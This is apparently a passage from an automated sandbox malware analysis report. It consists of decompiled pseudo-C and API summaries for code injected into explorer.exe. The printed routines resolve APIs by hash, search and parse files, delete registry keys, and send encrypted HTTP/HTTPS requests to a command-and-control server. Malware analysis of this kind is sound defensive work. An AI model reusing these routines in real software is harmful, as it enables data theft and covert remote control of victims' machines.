						_t128 =  *0x7ca180; // 0x7c1e3c
						_v28 = E007C1110(_v20, _t128);
						if(_v28 != 0) {
							_v28 = _v28 + 0xe;
							_v32 = E007C1110(_v28, E007C584C);
							 *_v32 = 0;
							E007C1308(_v8, _v28);
							 *_v32 = 0x22;
							_t131 =  *0x7ca184; // 0x7c1e4c
							_v28 = E007C1110(_v20, _t131);
							if(_v28 != 0) {
								_v28 = _v28 + 0x12;
								_v32 = E007C1110(_v28, 0x7c5850);
								 *_v32 = 0;
								E007C133C(_v8, 0x7c5854);
								E007C133C(_v8, _v28);
								_v12 = 0xffffffff;
							}
						}
					}
					E007C1828(_v20);
					goto L12;
					L11:
					_t81 = FindNextFileA(_v16,  &_v352); // executed
					asm("sbb eax, eax");
				} while ( ~( ~_t81) != 0);
				goto L12;
			}

























    0x007c5649
    0x007c564e
    0x007c5654
    0x007c5664
    0x007c566a
    0x007c5677
    0x007c567c
    0x007c567f
    0x007c5697
    0x007c569d
    0x007c56ab
    0x007c56b7
    0x007c5839
    0x007c583d
    0x007c5849
    0x00000000
    0x00000000
    0x00000000
    0x007c56bd
    0x007c56bd
    0x007c56c4
    0x00000000
    0x00000000
    0x007c56d6
    0x007c56e9
    0x007c56f1
    0x007c56fe
    0x007c5703
    0x007c570c
    0x007c5713
    0x00000000
    0x00000000
    0x007c5722
    0x007c5727
    0x007c572e
    0x00000000
    0x00000000
    0x007c573a
    0x007c573e
    0x007c574c
    0x007c5753
    0x007c5815
    0x00000000
    0x007c5815
    0x007c5759
    0x007c5763
    0x007c5769
    0x007c5777
    0x007c577e
    0x007c5784
    0x007c5795
    0x007c579b
    0x007c57a4
    0x007c57ac
    0x007c57af
    0x007c57bd
    0x007c57c4
    0x007c57c6
    0x007c57d7
    0x007c57dd
    0x007c57e9
    0x007c57f9
    0x007c5801
    0x007c5801
    0x007c57c4
    0x007c577e
    0x007c580b
    0x00000000
    0x007c581a
    0x007c5825
    0x007c582d
    0x007c5831
    0x00000000

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 007C5664
    • FindFirstFileA.KERNELBASE(?,00000080), ref: 007C5697
      • Part of subcall function 007C3988: FindFirstFileA.KERNELBASE(?,?), ref: 007C39A4
      • Part of subcall function 007C3988: FindClose.KERNEL32(000000FF), ref: 007C39BF
      • Part of subcall function 007C47AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C47D9
      • Part of subcall function 007C47AC: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C47FB
      • Part of subcall function 007C47AC: GetFileSize.KERNEL32(?,00000000), ref: 007C4810
      • Part of subcall function 007C47AC: ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007C483F
      • Part of subcall function 007C47AC: CloseHandle.KERNEL32(?), ref: 007C4849
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    • FindNextFileA.KERNELBASE(000000FF,00000080), ref: 007C5825
    • FindClose.KERNEL32(000000FF), ref: 007C583D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C5D20, Relevance: 4.2, Strings: 3, Instructions: 433Crypto
    C-Code - Quality: 98%
    			E007C5D20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, char _a28, intOrPtr* _a32, intOrPtr* _a36) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v168;
				char _v184;
				char _v200;
				char _v204;
				char _v269;
				char _v285;
				char _v301;
				char _v317;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				char _v336;
				char _v849;
				intOrPtr _t239;
				signed int _t250;
				intOrPtr _t254;
				char _t255;
				intOrPtr _t256;
				intOrPtr _t257;
				intOrPtr _t259;
				void* _t274;
				signed int _t330;
				intOrPtr _t436;
				intOrPtr _t438;
				void* _t470;

				_v8 = 0;
				if(_a16 == 0) {
					L40:
					return _v8;
				}
				_v64 = 0;
				if(_a20 == 0) {
					__eflags = 0;
					_v28 = 0;
					L9:
					_v60 = E007C1110(_a16, E007C633C);
					_t474 = _v60;
					if(_v60 == 0) {
						goto L40;
					}
					_v32 = _v60 - _a16;
					E007C12B8( &_v269, _v32, _a16);
					 *((char*)(_t470 + _v32 - 0x109)) = 0;
					E007C1308( &_v849, _v60);
					E007C54B8( &_v849, _v60, _t474);
					E007C5858( &_v301, 0x10); // executed
					E007C5858( &_v317, 0x10); // executed
					E007C12B8( &_v184, 0x10,  &_v301);
					E007C12B8( &_v200, 0x10,  &_v317);
					_v204 = _a28;
					if(_a12 != 0) {
						E007C12B8( &_v168, 0x51, _a12);
					}
					E007C17E8( &_v48, 0, 0, 0xf0000000, 1); // executed
					E007C18A0(_v48, 0x94, _a8,  &_v56, 0, 0);
					_v32 = 0x75;
					E007C1AB0(_v56, 0xffffffffffffffff, 0, 0x80,  &_v32,  &_v204, 0);
					E007C1AF8(_v56);
					E007C1B20(_v48, 0);
					E007C1268( &_v204, 0x80);
					_t239 =  *0x7ca1c0; // 0x7c1f00
					_v12 = E007C3864(_t239, _v28, _v64, 0, 0);
					_v28 = 1;
					E007C170C(_v12,  &_v28, 0x46, 4);
					_v28 = 0x1770;
					E007C170C(_v12,  &_v28, 2, 4);
					_v28 = 0x1f40;
					E007C170C(_v12,  &_v28, 6, 4);
					E007C170C(_v12,  &_v28, 5, 4);
					_v28 = 1;
					_t250 = E007C170C(_v12,  &_v28, 0x4d, 4);
					asm("sbb eax, eax");
					if( ~( ~_t250) == 0) {
						_v76 = 1;
						_v72 = 0;
						E007C170C(0,  &_v76, 0x32, 8);
					}
					if(_a4 == 0) {
						_v28 = 0x50;
					} else {
						_v28 = 0x1bb;
					}
					_t254 = E007C161C(_v12, _v28,  &_v269, 0, 0, 3, 0, 0); // executed
					_v16 = _t254;
					if(_a4 == 0) {
						_v28 = 0x4600000;
					} else {
						_v28 = 0x4e03000;
					}
					_t255 =  *0x7ca1c4; // 0x7c1f48
					_v336 = _t255;
					_t256 =  *0x7ca1c8; // 0x7c1f54
					_v332 = _t256;
					_t257 =  *0x7ca1cc; // 0x7c1f6c
					_v328 = _t257;
					_v324 = 0;
					_t259 =  *0x7ca23c; // 0x7c209c
					_t436 =  *0x7ca1ac; // 0x7c1ed4
					_v20 = E007C1660(_v16,  &_v849, _t436, 0, _v28,  &_v336, 0, _t259);
					if(_a4 != 0) {
						_v32 = 4;
						E007C16D8(_v20,  &_v28, 0x1f,  &_v32);
						_v28 = _v28 | 0x00000100;
						E007C170C(_v20,  &_v28, 0x1f, 4);
					}
					_t482 = _a24;
					if(_a24 == 0) {
						_v68 = E007C13DC(_v32 + 0x80);
						_t397 = 0x80;
						E007C12B8(_v68, 0x80,  &_v204);
						__eflags = 0;
						_v32 = 0;
					} else {
						E007C5894(_a24,  &_v301, _a28, _t482,  &_v32, 0);
						_v68 = E007C13DC(_v32 + 0x80);
						E007C12B8(_v68, 0x80,  &_v204);
						_t397 =  &_v301;
						E007C5894(_a24,  &_v301, _a28, _t482,  &_v32, _v68 + 0x80);
					}
					_t438 =  *0x7ca1d0; // 0x7c1f70
					_t274 = E007C15E4(_v20, _t397 | 0xffffffff, _t438, _v32 + 0x80, _v68); // executed
					if(_t274 != 0) {
						E007C1440(_v68);
						_v32 = 4;
						_v24 = 0;
						_v28 = 0;
						E007C39CC(_v20,  &_v24, 0x20000013,  &_v28,  &_v32);
						__eflags = _v24 - 0x12e;
						if(_v24 != 0x12e) {
							goto L39;
						}
						_v40 = E007C13DC(0x1000);
						__eflags = 0;
						_v36 = 0;
						while(1) {
							_v44 = E007C16A4(_v20, 0,  &_v32, 0);
							asm("sbb eax, eax");
							__eflags =  ~( ~_v44);
							if( ~( ~_v44) == 0) {
								goto L39;
							}
							__eflags = _v44;
							if(_v44 == 0) {
								continue;
							}
							__eflags = _v32;
							if(_v32 == 0) {
								__eflags = _v36 - 0x20;
								if(_v36 >= 0x20) {
									 *_a32 = E007C13DC(_v36 + 1);
									 *_a36 = _v36;
									E007C59BC(_v40 + 0x10,  &_v317, _v36 - 0x10, _a36,  *_a32);
									E007C17E8( &_v48, 0, 0, 0xf0000000, 1);
									E007C1374(_v48, 0, 0x8003,  &_v52, 0);
									E007C1404(_v52, 0x10,  &_v301, 0);
									E007C1404(_v52, 0x10,  &_v317, 0);
									E007C1404(_v52, E007C12DC( &_v269),  &_v269, 0);
									E007C1404(_v52,  *_a36,  *_a32, 0);
									_v32 = 0x10;
									E007C1490(_v52,  &_v285, 2, 0,  &_v32);
									E007C14D0(_v52);
									E007C1B20(_v48, 0);
									_t330 = E007C11F8( &_v285, 0x10, _v40);
									__eflags = _t330;
									if(_t330 != 0) {
										E007C1440(_v40);
										 *((char*)( *_a32 +  *_a36)) = 0;
										_v8 = 0xffffffff;
									} else {
										E007C1440(_v40);
										E007C1440( *_a32);
										 *_a32 = 0;
										 *_a36 = 0;
									}
								} else {
									E007C1440(_v40);
								}
								goto L39;
							}
							__eflags = _v36 + _v32 - 0x200000;
							if(_v36 + _v32 > 0x200000) {
								goto L39;
							}
							_v40 = E007C1460(_v40, _v36 + _v32);
							E007C15B0(_v20, _v32, _v40 + _v36,  &_v32);
							_v36 = _v36 + _v32;
						}
						goto L39;
					} else {
						E007C1440(_v68);
						L39:
						E007C151C(_v20);
						E007C151C(_v16);
						E007C151C(_v12);
						goto L40;
					}
				}
				if( *_a20 != 1) {
					__eflags =  *_a20 - 2;
					if( *_a20 != 2) {
						__eflags =  *_a20 - 3;
						if( *_a20 != 3) {
							goto L40;
						}
						_v28 = 3;
						_v64 = _a20 + 4;
						goto L9;
					}
					_v28 = 0;
				} else {
					_v28 = 1;
				}
			}














































    0x007c5d2b
    0x007c5d32
    0x007c6332
    0x007c6338
    0x007c6338
    0x007c5d3a
    0x007c5d41
    0x007c5d81
    0x007c5d83
    0x007c5d86
    0x007c5d93
    0x007c5d96
    0x007c5d9a
    0x00000000
    0x00000000
    0x007c5da6
    0x007c5db5
    0x007c5dbd
    0x007c5dce
    0x007c5dd9
    0x007c5de9
    0x007c5df9
    0x007c5e0f
    0x007c5e25
    0x007c5e2d
    0x007c5e37
    0x007c5e47
    0x007c5e47
    0x007c5e5a
    0x007c5e72
    0x007c5e77
    0x007c5e98
    0x007c5ea0
    0x007c5eaa
    0x007c5eba
    0x007c5ecb
    0x007c5ed6
    0x007c5ed9
    0x007c5eed
    0x007c5ef2
    0x007c5f06
    0x007c5f0b
    0x007c5f1f
    0x007c5f31
    0x007c5f36
    0x007c5f4a
    0x007c5f51
    0x007c5f57
    0x007c5f59
    0x007c5f62
    0x007c5f71
    0x007c5f71
    0x007c5f7a
    0x007c5f85
    0x007c5f7c
    0x007c5f7c
    0x007c5f7c
    0x007c5fa3
    0x007c5fa8
    0x007c5faf
    0x007c5fba
    0x007c5fb1
    0x007c5fb1
    0x007c5fb1
    0x007c5fc1
    0x007c5fc6
    0x007c5fcc
    0x007c5fd1
    0x007c5fd7
    0x007c5fdc
    0x007c5fe4
    0x007c5fea
    0x007c6005
    0x007c6013
    0x007c601a
    0x007c601c
    0x007c6032
    0x007c6037
    0x007c604b
    0x007c604b
    0x007c6050
    0x007c6054
    0x007c60bd
    0x007c60c6
    0x007c60ce
    0x007c60d3
    0x007c60d5
    0x007c6056
    0x007c6068
    0x007c607a
    0x007c608b
    0x007c609d
    0x007c60a9
    0x007c60a9
    0x007c60e8
    0x007c60f1
    0x007c60f8
    0x007c610a
    0x007c610f
    0x007c6118
    0x007c611d
    0x007c6133
    0x007c6138
    0x007c613f
    0x00000000
    0x00000000
    0x007c614f
    0x007c6152
    0x007c6154
    0x007c6157
    0x007c6166
    0x007c616e
    0x007c6172
    0x007c6174
    0x00000000
    0x00000000
    0x007c617a
    0x007c617e
    0x00000000
    0x00000000
    0x007c6180
    0x007c6184
    0x007c61c5
    0x007c61c9
    0x007c61e4
    0x007c61ec
    0x007c620a
    0x007c621d
    0x007c6232
    0x007c6247
    0x007c625c
    0x007c6279
    0x007c628d
    0x007c6292
    0x007c62ad
    0x007c62b5
    0x007c62bf
    0x007c62d2
    0x007c62d7
    0x007c62d9
    0x007c6300
    0x007c630f
    0x007c6313
    0x007c62db
    0x007c62de
    0x007c62e8
    0x007c62f2
    0x007c62f9
    0x007c62f9
    0x007c61cb
    0x007c61ce
    0x007c61ce
    0x00000000
    0x007c61c9
    0x007c618c
    0x007c6191
    0x00000000
    0x00000000
    0x007c61a5
    0x007c61b8
    0x007c61c0
    0x007c61c0
    0x00000000
    0x007c60fa
    0x007c60fd
    0x007c631a
    0x007c631d
    0x007c6325
    0x007c632d
    0x00000000
    0x007c632d
    0x007c60f8
    0x007c5d49
    0x007c5d57
    0x007c5d5a
    0x007c5d66
    0x007c5d69
    0x00000000
    0x00000000
    0x007c5d6f
    0x007c5d7c
    0x00000000
    0x007c5d7c
    0x007c5d5e
    0x007c5d4b
    0x007c5d4b
    0x007c5d4b

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C8A48, Relevance: 3.0, APIs: 2, Instructions: 34nativewindow
    C-Code - Quality: 58%
    			E007C8A48(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				void* _t12;
				intOrPtr _t23;
				void* _t24;

				_t12 = _a8 - 2;
				if(_t12 == 0) {
					PostQuitMessage(0);
					_v8 = 0;
				} else {
					if(_t12 == 0xf) {
						E007C78FC(_a16 & 0x80000000, _t24);
						_v8 = 1;
					} else {
						_t23 =  *0x7cb300(_a4, _a8, _a12, _a16); // executed
						_v8 = _t23;
					}
				}
				return _v8;
			}







    0x007c8a51
    0x007c8a54
    0x007c8a5f
    0x007c8a67
    0x007c8a56
    0x007c8a59
    0x007c8a74
    0x007c8a79
    0x007c8a5b
    0x007c8a92
    0x007c8a98
    0x007c8a98
    0x007c8a59
    0x007c8aa1

    APIs
    • PostQuitMessage.USER32(00000000), ref: 007C8A5F
      • Part of subcall function 007C78FC: SHDeleteKeyA.SHLWAPI(80000002,007C21A4), ref: 007C795A
      • Part of subcall function 007C78FC: SHDeleteKeyA.SHLWAPI(80000001,007C21A4), ref: 007C796D
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 007C8A92
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C3988, Relevance: 3.0, APIs: 2, Instructions: 24
    C-Code - Quality: 84%
    			E007C3988(CHAR* __eax) {
				CHAR* _v8;
				signed char _v12;
				void* _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t16;

				_v8 = __eax;
				_v12 = 0;
				_t16 = FindFirstFileA(_v8,  &_v336); // executed
				_v16 = _t16;
				asm("sbb eax, eax");
				_v12 =  ~(_t16 & 0xffffff00 | _v16 != 0xffffffff);
				FindClose(_v16);
				return _v12;
			}








    0x007c3991
    0x007c3996
    0x007c39a4
    0x007c39aa
    0x007c39b6
    0x007c39b8
    0x007c39bf
    0x007c39cb

    APIs
    • FindFirstFileA.KERNELBASE(?,?), ref: 007C39A4
    • FindClose.KERNEL32(000000FF), ref: 007C39BF
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C18A0, Relevance: 1.5, APIs: 1, Instructions: 27encryption
    C-Code - Quality: 100%
    			E007C18A0(long* __eax, int __ecx, BYTE* __edx, HCRYPTKEY* _a4, int _a8, long* _a12) {
				long* _v8;
				BYTE* _v12;
				int _v16;
				int _v20;
				int _t21;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x7cb500)) != 0xe9) {
					_t21 = CryptImportKey(_v8, _v12, _v16, _a12, _a8, _a4); // executed
					_v20 = _t21;
				}
				return _v20;
			}








    0x007c18a6
    0x007c18a9
    0x007c18ac
    0x007c18b7
    0x007c18d1
    0x007c18d7
    0x007c18d7
    0x007c18e0

    APIs
    • CryptImportKey.ADVAPI32(?,?,?,?,?,?), ref: 007C18D1
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C8A44, Relevance: 1.5, APIs: 1, Instructions: 26nativewindow
    C-Code - Quality: 58%
    			E007C8A44(intOrPtr* __eax, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				intOrPtr _v117;
				void* _t15;
				intOrPtr _t26;
				void* _t27;

				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_t15 = _a12 - 2;
				if(_t15 == 0) {
					PostQuitMessage(0);
					_v8 = 0;
				} else {
					if(_t15 == 0xf) {
						E007C78FC(_a16 & 0x80000000, _t27);
						_v8 = 1;
					} else {
						_t26 =  *0x7cb300(_a4, _a8, _a12, _a16); // executed
						_v8 = _t26;
					}
				}
				return _v8;
			}








    0x007c8a45
    0x007c8a47
    0x007c8a51
    0x007c8a54
    0x007c8a5f
    0x007c8a67
    0x007c8a56
    0x007c8a59
    0x007c8a74
    0x007c8a79
    0x007c8a5b
    0x007c8a92
    0x007c8a98
    0x007c8a98
    0x007c8a59
    0x007c8aa1

    APIs
      • Part of subcall function 007C78FC: SHDeleteKeyA.SHLWAPI(80000002,007C21A4), ref: 007C795A
      • Part of subcall function 007C78FC: SHDeleteKeyA.SHLWAPI(80000001,007C21A4), ref: 007C796D
    • PostQuitMessage.USER32(00000000), ref: 007C8A5F
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 007C8A92
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C17E8, Relevance: 1.5, APIs: 1, Instructions: 25encryption
    C-Code - Quality: 100%
    			E007C17E8(HCRYPTPROV* __eax, char* __ecx, char* __edx, int _a4, int _a8) {
				HCRYPTPROV* _v8;
				char* _v12;
				char* _v16;
				int _v20;
				int _t19;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x7cb4fc)) != 0xe9) {
					_t19 = CryptAcquireContextA(_v8, _v12, _v16, _a8, _a4); // executed
					_v20 = _t19;
				}
				return _v20;
			}








    0x007c17ee
    0x007c17f1
    0x007c17f4
    0x007c17ff
    0x007c1815
    0x007c181b
    0x007c181b
    0x007c1824

    APIs
    • CryptAcquireContextA.ADVAPI32(?,?,?,?,?), ref: 007C1815
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C2574, Relevance: 53.6, APIs: 14, Strings: 16, Instructions: 1068library

    Control-flow Graph

    C-Code - Quality: 100%
    			E007C2574(intOrPtr __eax) {
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				CHAR* _t492;
				CHAR* _t500;
				struct HINSTANCE__* _t564;
				CHAR* _t567;
				struct HINSTANCE__* _t568;
				CHAR* _t571;
				CHAR* _t587;
				CHAR* _t669;
				CHAR* _t677;
				CHAR* _t685;
				struct HINSTANCE__* _t686;
				CHAR* _t693;
				CHAR* _t699;
				struct HINSTANCE__* _t700;
				CHAR* _t707;
				intOrPtr _t712;
				CHAR* _t713;
				struct HINSTANCE__* _t714;
				CHAR* _t755;
				struct HINSTANCE__* _t756;

				_v8 = __eax;
				_v12 = E007C24F8();
				 *0x7cb11c = E007C1994(_v12, 0xc8ac8026);
				 *0x7cb120 = E007C1994(_v12, 0x4b935b8e);
				 *0x7cb1d0 = E007C1994(_v12, 0x78b00c7e);
				 *0x7cb144 = E007C1994(_v12, 0x25447ac6);
				 *0x7cb148 = E007C1994(_v12, 0xf50b872);
				 *0x7cb160 = E007C1994(_v12, 0x9e6fa842);
				 *0x7cb1bc = E007C1994(_v12, 0x7d544dbd);
				 *0x7cb124 = E007C1994(_v12, 0x1fc0eaee);
				 *0x7cb384 = E007C1994(_v12, 0x270118e2);
				 *0x7cb498 = E007C1994(_v12, 0x4ae7572b);
				 *0x7cb138 = E007C1994(_v12, 0x81f0f0c9);
				 *0x7cb140 = E007C1994(_v12, 0x95fb6a02);
				 *0x7cb334 = E007C1994(_v12, 0x70f6fe31);
				 *0x7cb338 = E007C1994(_v12, 0x399354ce);
				 *0x7cb128 = E007C1994(_v12, 0xa45b370a);
				 *0x7cb208 = E007C1994(_v12, 0x2b00b870);
				 *0x7cb1c4 = E007C1994(_v12, 0x4fba916c);
				 *0x7cb2a4 = E007C1994(_v12, 0xc54374f3);
				 *0x7cb2a0 = E007C1994(_v12, 0x9c700049);
				 *0x7cb29c = E007C1994(_v12, 0x4f6ca717);
				 *0x7cb2d8 = E007C1994(_v12, 0x67ecde97);
				 *0x7cb2dc = E007C1994(_v12, 0xfdc94385);
				 *0x7cb2e0 = E007C1994(_v12, 0x68807354);
				 *0x7cb2e4 = E007C1994(_v12, 0x84d25ea);
				 *0x7cb2e8 = E007C1994(_v12, 0xfc7a6efd);
				 *0x7cb2ec = E007C1994(_v12, 0x5550b067);
				 *0x7cb2f0 = E007C1994(_v12, 0xaebea6a);
				 *0x7cb12c = E007C1994(_v12, 0x46318ac7);
				 *0x7cb130 = E007C1994(_v12, 0x49a1374a);
				 *0x7cb134 = E007C1994(_v12, 0xae17c571);
				 *0x7cb150 = E007C1994(_v12, 0xe61874b3);
				 *0x7cb154 = E007C1994(_v12, 0x3a7a7478);
				 *0x7cb158 = E007C1994(_v12, 0x533d3b41);
				 *0x7cb15c = E007C1994(_v12, 0x99a4299d);
				 *0x7cb164 = E007C1994(_v12, 0xbea0bf35);
				 *0x7cb168 = E007C1994(_v12, 0x9d00a761);
				 *0x7cb188 = E007C1994(_v12, 0x9abfb8a6);
				 *0x7cb194 = E007C1994(_v12, 0x6b416786);
				 *0x7cb198 = E007C1994(_v12, 0x774393e8);
				 *0x7cb19c = E007C1994(_v12, 0x2ee4f10d);
				 *0x7cb1a0 = E007C1994(_v12, 0x19f78c90);
				 *0x7cb1a4 = E007C1994(_v12, 0xd89ad05);
				 *0x7cb1a8 = E007C1994(_v12, 0xc930ea1e);
				 *0x7cb18c = E007C1994(_v12, 0x5bc1d14f);
				 *0x7cb1e0 = E007C1994(_v12, 0x77cd9567);
				 *0x7cb1f0 = E007C1994(_v12, 0x32432444);
				 *0x7cb1f4 = E007C1994(_v12, 0x279dead7);
				 *0x7cb1f8 = E007C1994(_v12, 0x7b4842c1);
				 *0x7cb1fc = E007C1994(_v12, 0xae52c609);
				 *0x7cb200 = E007C1994(_v12, 0xbf78969c);
				 *0x7cb204 = E007C1994(_v12, 0xbb74a4a2);
				 *0x7cb22c = E007C1994(_v12, 0x464871f3);
				 *0x7cb190 = E007C1994(_v12, 0x9bd6888f);
				 *0x7cb20c = E007C1994(_v12, 0x5c17ec75);
				 *0x7cb210 = E007C1994(_v12, 0x58fe7abe);
				 *0x7cb254 = E007C1994(_v12, 0x768aa260);
				 *0x7cb25c = E007C1994(_v12, 0xef0a25b7);
				 *0x7cb260 = E007C1994(_v12, 0xbc262395);
				 *0x7cb264 = E007C1994(_v12, 0xe8bf6dad);
				 *0x7cb268 = E007C1994(_v12, 0x5cd9430);
				 *0x7cb26c = E007C1994(_v12, 0xaef7cbf1);
				 *0x7cb274 = E007C1994(_v12, 0x475587b7);
				 *0x7cb278 = E007C1994(_v12, 0x3def91ba);
				 *0x7cb408 = E007C1994(_v12, 0xda81bc58);
				 *0x7cb40c = E007C1994(_v12, 0xf3b84f05);
				 *0x7cb410 = E007C1994(_v12, 0x392b6027);
				 *0x7cb414 = E007C1994(_v12, 0x7b2d2505);
				 *0x7cb314 = E007C1994(_v12, 0xeeba5eba);
				 *0x7cb2a8 = E007C1994(_v12, 0x89b968d2);
				 *0x7cb2c0 = E007C1994(_v12, 0x7e92ca65);
				 *0x7cb2f4 = E007C1994(_v12, 0x4c1077d6);
				 *0x7cb31c = E007C1994(_v12, 0x84033deb);
				 *0x7cb320 = E007C1994(_v12, 0x725cb0a1);
				 *0x7cb250 = E007C1994(_v12, 0x52ac19c);
				 *0x7cb318 = E007C1994(_v12, 0x23ebe98b);
				 *0x7cb464 = E007C1994(_v12, 0x3b3ee0f9);
				 *0x7cb468 = E007C1994(_v12, 0x8d5a50dc);
				 *0x7cb46c = E007C1994(_v12, 0x8d5a50ca);
				 *0x7cb470 = E007C1994(_v12, 0x5e7ee0d0);
				 *0x7cb474 = E007C1994(_v12, 0x69260152);
				 *0x7cb478 = E007C1994(_v12, 0x9c480e24);
				 *0x7cb47c = E007C1994(_v12, 0x5aa7e70b);
				 *0x7cb488 = E007C1994(_v12, 0xe74f57ee);
				 *0x7cb48c = E007C1994(_v12, 0x2d40b8f0);
				 *0x7cb490 = E007C1994(_v12, 0xae17c071);
				 *0x7cb494 = E007C1994(_v12, 0x515be757);
				 *0x7cb49c = E007C1994(_v12, 0x1297812c);
				 *0x7cb4a0 = E007C1994(_v12, 0x2f2feeda);
				 *0x7cb4a4 = E007C1994(_v12, 0x81f0f0df);
				 *0x7cb4a8 = E007C1994(_v12, 0xf3fd1c3);
				 *0x7cb4ac = E007C1994(_v12, 0xef48e03a);
				 *0x7cb4b0 = E007C1994(_v12, 0xfb0730c);
				 *0x7cb4b4 = E007C1994(_v12, 0xa9de6f5a);
				 *0x7cb4b8 = E007C1994(_v12, 0x723eb0d5);
				 *0x7cb4bc = E007C1994(_v12, 0x487fe16b);
				 *0x7cb4c0 = E007C1994(_v12, 0x8f8f114);
				 *0x7cb4c4 = E007C1994(_v12, 0x3d9972f5);
				 *0x7cb4c8 = E007C1994(_v12, 0x6fb89af0);
				 *0x7cb4cc = E007C1994(_v12, 0xc09d5d66);
				 *0x7cb4d0 = E007C1994(_v12, 0x2ca2b7e6);
				 *0x7cb4d4 = E007C1994(_v12, 0x7b88bf3b);
				 *0x7cb4d8 = E007C1994(_v12, 0xaa1de02f);
				 *0x7cb4dc = E007C1994(_v12, 0xa48d6762);
				 *0x7cb4e0 = E007C1994(_v12, 0x3a35705f);
				 *0x7cb4e8 = E007C1994(_v12, 0x697a6afe);
				 *0x7cb4ec = E007C1994(_v12, 0x95902b19);
				 *0x7cb4f0 = E007C1994(_v12, 0x1295012c);
				 *0x7cb4f4 = E007C1994(_v12, 0x2891ae7a);
				 *0x7cb4f8 = E007C1994(_v12, 0x831a3927);
				 *0x7cb23c = E007C1994(_v12, 0xd0498cd4);
				 *0x7cc22c = E007C1994(_v12, 0xd0498cc2);
				_t492 =  *0x7ca084; // 0x7c1bf0
				_v12 = LoadLibraryA(_t492);
				 *0x7cb230 = E007C1994(_v12, 0xa638ce5f);
				 *0x7cb234 = E007C1994(_v12, 0xbc44a131);
				 *0x7cb238 = E007C1994(_v12, 0xf6edf382);
				_t500 =  *0x7ca080; // 0x7c1be8
				_v12 = LoadLibraryA(_t500);
				 *0x7cb2fc = E007C1994(_v12, 0x1ab922bf);
				 *0x7cb2f8 = E007C1994(_v12, 0xa8afd1f3);
				 *0x7cb300 = E007C1994(_v12, 0xc6ce9b8a);
				 *0x7cb304 = E007C1994(_v12, 0xf26817eb);
				 *0x7cb308 = E007C1994(_v12, 0x7506e960);
				 *0x7cb30c = E007C1994(_v12, 0xbf7efb5a);
				 *0x7cb310 = E007C1994(_v12, 0x4baed1c8);
				 *0x7cb484 = E007C1994(_v12, 0x7396104b);
				 *0x7cb480 = E007C1994(_v12, 0xb800c8a6);
				 *0x7cb388 = E007C1994(_v12, 0x8616ab9b);
				 *0x7cb38c = E007C1994(_v12, 0xb4584dda);
				 *0x7cb1b4 = E007C1994(_v12, 0x6c7f716f);
				 *0x7cb1b0 = E007C1994(_v12, 0x252b53b);
				 *0x7cb2ac = E007C1994(_v12, 0xd36ceaf0);
				 *0x7cb2b0 = E007C1994(_v12, 0xd7a87c3a);
				 *0x7cb2b4 = E007C1994(_v12, 0xc45d9631);
				 *0x7cb2b8 = E007C1994(_v12, 0x4baed1de);
				 *0x7cb2bc = E007C1994(_v12, 0x8ebef5b1);
				 *0x7cb270 = E007C1994(_v12, 0xea3af0d7);
				 *0x7cb418 = E007C1994(_v12, 0x484007c);
				 *0x7cb41c = E007C1994(_v12, 0x58a81c29);
				 *0x7cb420 = E007C1994(_v12, 0xcacd450);
				 *0x7cb424 = E007C1994(_v12, 0xabbc680d);
				 *0x7cb42c = E007C1994(_v12, 0x7cbd2247);
